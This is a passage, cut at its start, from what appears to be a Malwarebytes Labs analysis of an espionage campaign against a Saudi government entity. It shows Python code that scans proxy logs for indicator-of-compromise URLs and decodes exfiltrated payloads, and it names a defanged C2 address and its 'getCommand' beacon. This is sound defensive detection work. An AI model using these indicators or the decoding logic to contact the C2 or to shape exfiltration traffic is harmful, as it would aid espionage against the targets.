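    host = parts.netloc.lower()
    host = host[4:] if host.startswith("www.") else host
    candidate = host + parts.path + "?" + parts.query
    return next((ioc for ioc in IOC_PREFIXES if candidate.startswith(ioc)), None)


def scan_proxy_log(lines):
    """Report every request hitting an indicator, with its decoded payload."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ioc = match_ioc(m["url"])
        if ioc:
            hits.append({"client": m["client"], "ioc": ioc, "decoded": decode_exfil(m["url"])})
    return hits
```

A hit whose payload does not decode is still a hit: the third constructed line shows that the match is made on host and path, and the decode is only an aid for reading what was sent. The `getCommand` beacon to the C2 at 144.76.109[.]88 is not in this list because it goes to the C2 directly rather than through a proxy site; add it to `PROXY_IOCS` if your logs cover that traffic.
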

The post Elaborate scripting-fu used in espionage attack against Saudi Arabia Government entity appeared first on Malwarebytes Labs.

